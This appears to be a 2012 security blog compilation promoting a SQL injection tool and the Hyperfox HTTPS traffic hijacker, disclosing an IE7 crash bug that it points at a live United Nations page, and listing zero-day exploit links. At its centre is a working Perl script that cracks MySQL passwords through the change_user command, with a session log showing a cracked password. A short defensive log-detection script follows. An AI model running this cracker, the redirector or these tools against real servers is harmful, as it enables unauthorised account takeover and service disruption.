Dec 7, 2012

jSQL Injection - Java based automated SQL injection tool

An easy-to-use SQL injection tool for retrieving database information from a remote server.
jSQL Injection features:
  • GET, POST, header and cookie injection methods
  • normal, error-based, blind and time-based algorithms
  • automatic detection of the best algorithm
  • progress display while data is retrieved
  • proxy settings
  • evasion
  • currently supports MySQL only
Download the Java executable here, or access the source code for programmers in the Google Git repository. Current tools used for development: Windows 7, Eclipse, EasyPHP, Notepad++ and EGit.
Next work: speed increase (100% faster, literally), more blind testing, automatic code testing (JUnit)

Source: http://www.breakthesecurity.com/2012/11/jsqli-sql-injection-tool.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 6, 2012

Hyperfox: transparently hijacking/proxying HTTP and HTTPS traffic

Installation

Before installing, make sure you have a working Go environment and git.
Check that your PATH and GOPATH variables are correctly set in your .bashrc, .zshrc or .profile file.
$ cat .zshrc
# ... stuff ...
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
And that the pkg, src and bin directories exist under $GOPATH.
$ mkdir -p $GOPATH/src
$ mkdir -p $GOPATH/bin
$ mkdir -p $GOPATH/pkg
Now attempt to install.
% go get github.com/xiam/hyperfox
% hyperfox -h

Usage example

Run hyperfox; it starts in HTTP mode listening on 0.0.0.0:9999 by default.
% hyperfox
If you want to analyze HTTPS instead of HTTP, use the -s flag and provide appropriate cert.pem and key.pem files.
% hyperfox -s -c ssl/cert.pem -k ssl/key.pem
hyperfox won’t be of much use if the host machine has no traffic to analyze or if the only traffic to analyze is its own.

Source: http://reventlov.com/projects/hyperfox

DoS vulnerabilities in Internet Explorer 7 (access violation)

-------------------------
Affected products:
-------------------------

Internet Explorer 7 (7.00.5730.13) and other versions of IE7 are vulnerable.
IE6 and IE8 are not affected.

----------
Details:
----------

DoS:

When a redirector that responds with 301, 302 or 303 and a data: URI in the
Location header is included in a frame or iframe tag, the browser crashes (the
attack doesn't work with other 30x statuses). It happens due to an access
violation (aka segmentation fault) in iexplore.exe.

Exploit:

http://websecurity.com.ua/uploads/2012/IE7%20DoS.txt

This is a 302 redirector in Perl. You can make similar redirectors with 301,
302 or 303 statuses.

As a 301 redirector you can use my example with a data: URI at TinyURL:

http://tinyurl.com/fj4hm

The attack works from the second attempt. So you need to go to the redirector
twice (set the URL twice in the address bar, or, after the error page appears,
return to the previous page in the browser).

Example of an attack with this redirector via the vulnerability
(http://websecurity.com.ua/4526/) at the United Nations' site (they haven't
fixed it since 29.04.2010, when I found this hole and informed the UN, so you
can use it for checking purposes):

http://www.un.org/zh/documents/view_doc.asp?url=http://tinyurl.com/fj4hm
Source: http://seclists.org/fulldisclosure/2012/Dec/85


Dec 5, 2012

Interesting Exploits in 2012-12-05 [Apache Tomcat]

Apache Tomcat 6.x / 7.x Denial Of Service
http://packetstormsecurity.org/files/118615

Apache Tomcat Security Bypass
http://packetstormsecurity.org/files/118616

Apache Tomcat CSRF Prevention Filter Bypass
http://packetstormsecurity.org/files/118617



Dec 4, 2012

MySQL Local/Remote FAST Account Password Cracking By Kingcope

The attacker logs into the MySQL server with an unprivileged account.
There is a command in MySQL called change_user; as the name suggests, this
command can be used to change the user during a MySQL session.
Since MySQL is very fast at doing this, it is much more powerful for cracking
passwords than reconnecting to the MySQL server every time to brute-force
passwords (which would be VERY slow).
Since the SALT does not change in the change_user command (and this is the
weak point), it is a convenient way to crack passwords. (When connecting to
MySQL, the SALT is different in each connection attempt and is sent out by
the server.)
 
use strict;
use warnings;
use Net::MySQL;

$| = 1;    # unbuffered output so the result shows up immediately

# Authenticate once with the low-privileged account; the salt from this
# handshake is what every COM_CHANGE_USER attempt below is scrambled with.
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);

my $crackuser = "crackme";    # account whose password is being guessed

# Candidate passwords arrive on standard input, one per line (e.g. from john).
while (my $currentpass = <STDIN>) {
    chomp $currentpass;

    # COM_CHANGE_USER payload: user name, NUL, 0x14 (length of the 20-byte
    # auth response), the password scrambled with the connection's fixed
    # salt, then an empty database name terminated by NUL.
    my $vv = join "\0",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
        ) . "\0";

    # 0x11 is COM_CHANGE_USER; as in the original check, any non-empty reply
    # is treated as an accepted guess.
    my $reply = $mysql->_execute_command("\x11", $vv);
    if (defined $reply && $reply ne '') {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}
---
example session:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
 
Source: http://seclists.org/fulldisclosure/2012/Dec/58 
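A defender-side counterpart to the technique above, added here and not part of Kingcope's post: the signature of this attack is a single connection issuing Change user commands in a tight loop, most of them denied, so this parser counts COM_CHANGE_USER attempts and "Access denied" results per thread id. The log lines are constructed to approximate the MySQL general query log layout (timestamp, thread id, command name, argument), and the alert threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample lines approximating the MySQL general query log layout
# (timestamp, thread id, command name, argument); not captured from a server.
SAMPLE_LOG = """\
121204 13:45:01\t   12 Connect\tuser@192.168.2.5 on test
121204 13:45:01\t   12 Query\tselect 1
121204 13:45:02\t   12 Change user\tAccess denied for user 'crackme'@'192.168.2.5' (using password: YES)
121204 13:45:02\t   12 Change user\tAccess denied for user 'crackme'@'192.168.2.5' (using password: YES)
121204 13:45:02\t   12 Change user\tAccess denied for user 'crackme'@'192.168.2.5' (using password: YES)
121204 13:45:03\t   13 Connect\tapp@10.0.0.7 on shop
121204 13:45:03\t   13 Change user\tbackup@10.0.0.7 on shop
121204 13:45:03\t   12 Change user\tAccess denied for user 'crackme'@'192.168.2.5' (using password: YES)
121204 13:45:03\t   12 Change user\tcrackme@192.168.2.5 on test
"""

# optional timestamp, thread id, command name (may contain a space), argument
LINE_RE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+([A-Za-z][A-Za-z ]*?)\t(.*)$")
DENIED_RE = re.compile(r"Access denied for user '([^']*)'")


def change_user_stats(log_text):
    """Per thread id: number of Change user attempts, how many were denied,
    and the user names targeted. Reconnecting attackers show up as many
    Connect lines; the change_user trick shows up on one thread id."""
    stats = defaultdict(lambda: {"attempts": 0, "denied": 0, "users": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(2) != "Change user":
            continue
        thread, arg = m.group(1), m.group(3)
        entry = stats[thread]
        entry["attempts"] += 1
        denied = DENIED_RE.search(arg)
        if denied:
            entry["denied"] += 1
            entry["users"].add(denied.group(1))
        else:
            entry["users"].add(arg.split("@", 1)[0])  # "user@host on db"
    return dict(stats)


def flag_change_user_bruteforce(log_text, max_denied=3):
    """Thread ids with at least max_denied failed Change user attempts;
    the threshold is an assumption, tune it to the workload."""
    return sorted(t for t, s in change_user_stats(log_text).items()
                  if s["denied"] >= max_denied)
```

At the rate shown in the session above (thousands of guesses per second on one connection), even a low per-connection threshold fires within the first second of an attempt.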



Interesting Exploits in 2012-12-04 [Oracle, Web Application]

Oracle MySQL Privilege Escalation 
http://packetstormsecurity.org/files/118552

vBulletin 3.x <= 4.2.0 FAQ (Echo config) bug
http://1337day.com/exploit/19862 

Oracle MySQL 5.5.19-log Denial Of Service
http://packetstormsecurity.org/files/118553

Oracle MySQL Windows Stuxnet Technique SYSTEM Exploit 
http://packetstormsecurity.org/files/118554

Oracle MySQL User Account Enumeration Utility 
http://packetstormsecurity.org/files/118555

RIM BlackBerry PlayBook OS 1.0.8.6067 Local File Access Vulnerability 
http://1337day.com/exploit/19870

vBulletin 4.2.0 Full Path Disclosure Vulnerability
http://1337day.com/exploits/19874

Wordpress 3.4.2 Full Path Disclosure Vulnerability
http://1337day.com/exploits/19876


Dec 2, 2012

Interesting Exploits in 2012-12-02 [MySQL]

MySQL (Linux) Heap Based Overrun PoC Zeroday 

http://1337day.com/exploit/19850

MySQL Denial of Service Zeroday PoC

http://1337day.com/exploit/19851

MySQL (Linux) Database Privilege Elevation Zeroday Exploit

http://1337day.com/exploit/19852

MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)

http://1337day.com/exploit/19853

MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday

http://1337day.com/exploit/19854

MySQL Remote Preauth User Enumeration Zeroday

http://1337day.com/exploit/19857

SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

http://1337day.com/exploit/19858

MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

http://1337day.com/exploit/19859